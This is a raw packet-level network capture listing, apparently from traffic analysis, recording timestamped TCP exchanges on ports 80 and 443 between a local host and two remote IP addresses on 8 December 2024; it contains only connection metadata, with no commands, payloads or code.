Dec 8, 2024 13:31:50.598830938 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.598880053 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.599591017 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.599638939 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.599670887 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.599718094 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.600385904 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.600445032 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.600560904 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.600649118 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.601188898 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.601233006 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.601295948 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.601337910 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.602045059 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.602094889 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.602130890 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.602200985 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.602891922 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.602998972 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.603004932 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.603035927 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.603743076 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.603806973 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.603837013 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.603872061 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.604607105 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.604655027 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.604707003 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.604749918 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.605520010 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.605597019 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.605643034 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.606456995 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.606507063 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.606509924 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.606617928 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.607198000 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.607251883 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.607290983 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.607403994 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.608059883 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.608161926 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.608297110 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.608345032 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.609074116 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.609086037 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.609123945 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.609750986 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.609810114 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.609849930 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.609898090 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.610677958 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.610699892 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.610727072 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.610738993 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.611411095 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.611505985 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.611546993 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.612261057 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.612308025 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.612376928 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.612420082 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.613198042 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.613243103 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.613274097 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.613318920 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.614013910 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.614063025 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.614207029 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.614253998 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.615008116 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.615047932 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.615140915 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.615185976 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.615900040 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.615971088 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.616008043 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.616051912 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.616635084 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.616703987 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.616739988 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.616782904 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.617497921 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.617511988 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.617542028 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.617554903 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.618227005 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.618280888 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.618429899 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.618607998 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.619127035 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.619178057 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.619256020 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.619326115 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.619936943 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.619988918 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.620016098 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.620066881 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.620779037 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.620915890 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.620964050 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.621624947 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.621669054 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.621778011 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.621828079 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.622458935 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.622519016 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.622584105 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.622651100 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.623323917 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.623369932 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.623433113 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.623481989 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.624180079 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.624233007 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.624253988 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.624298096 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.625029087 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.625092030 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.625098944 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.625252008 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.625886917 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.625969887 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.625997066 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.626049042 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.626724958 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.626773119 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.626857042 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.626899958 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.627564907 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.627609968 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.627686977 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.627732038 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.628438950 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.628494978 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.628520966 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.628639936 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.629302979 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.629345894 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.629401922 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.629462957 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.630162954 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.630260944 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.630280018 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.630326033 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.631051064 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.631095886 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.631169081 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.631215096 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.631860971 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.631920099 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.631983042 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.632029057 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.632788897 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.632836103 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.632889986 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.632977009 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.633563042 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.633614063 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.633661032 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.633723974 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.634407043 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.634454012 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.634598017 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.634645939 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.635260105 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.635308027 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.635646105 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.635691881 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.636132956 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.636187077 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.636212111 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.636257887 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.636955976 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.637005091 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.637053967 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.637093067 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.637835026 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.637881994 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.637981892 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.638091087 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.638662100 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.638772011 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.638847113 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.638889074 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.639508009 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.639552116 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.639630079 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.639698982 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.640362024 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.640410900 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.640485048 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.640579939 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.641212940 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.641266108 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.641309023 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.641359091 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.642007113 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.642041922 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.647223949 CET	443	49844	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:50.647295952 CET	443	49844	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:50.647347927 CET	49844	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:50.647666931 CET	49844	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:50.647679090 CET	443	49844	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:50.647706985 CET	49844	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:50.647711992 CET	443	49844	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:50.650767088 CET	443	49843	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:50.650826931 CET	443	49843	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:50.650885105 CET	49843	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:50.650978088 CET	49843	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:50.650995970 CET	443	49843	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:50.651004076 CET	49843	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:50.651009083 CET	443	49843	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:50.651316881 CET	49849	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:50.651354074 CET	443	49849	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:50.651515961 CET	49849	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:50.651879072 CET	49849	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:50.651895046 CET	443	49849	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:50.653423071 CET	49850	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:50.653439045 CET	443	49850	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:50.653485060 CET	49850	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:50.653590918 CET	49850	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:50.653599977 CET	443	49850	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:50.789470911 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.789530993 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.789551973 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.789632082 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.789701939 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.789777040 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.789786100 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.789864063 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.790568113 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.790621042 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.790725946 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.790812969 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.791456938 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.791505098 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.791575909 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.791770935 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.792263031 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.792320967 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.792346001 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.792385101 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.793070078 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.793117046 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.793174028 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.793221951 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.793937922 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.794039011 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.794090986 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.794847012 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.794889927 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.794926882 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.794970989 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.795640945 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.795701027 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.795762062 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.795831919 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.796797991 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.796838045 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.796864986 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.796916008 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.797446966 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.797514915 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.797558069 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.798197031 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.798243046 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.798250914 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.798324108 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.799045086 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.799103022 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.799171925 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.799217939 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.799890041 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.799937963 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.800004005 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.800045013 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.800858021 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.800935984 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.800987959 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.801062107 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.801719904 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.801768064 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.801780939 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.801815987 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.802534103 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.802572966 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.802587032 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.802607059 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.803329945 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.803375959 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.803412914 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.803529978 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.804183960 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.804229975 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.804251909 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.804295063 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.805021048 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.805075884 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.805119991 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.805160046 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.805831909 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.805886984 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.805965900 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.806003094 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.806740046 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.806782961 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.806797028 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.806837082 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.807557106 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.807606936 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.807653904 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.807698965 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.808515072 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.808608055 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.808654070 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.808700085 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.809269905 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.809315920 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.809470892 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.809529066 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.810134888 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.810184956 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.810208082 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.810250044 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.810966015 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.811017990 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.811065912 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.811111927 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.811111927 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.811820030 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.811925888 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.811939955 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.811978102 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.812725067 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.812772036 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.812794924 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:50.812833071 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:50.813508034 CET	80	49835	185.215.113.206	192.168.2.6
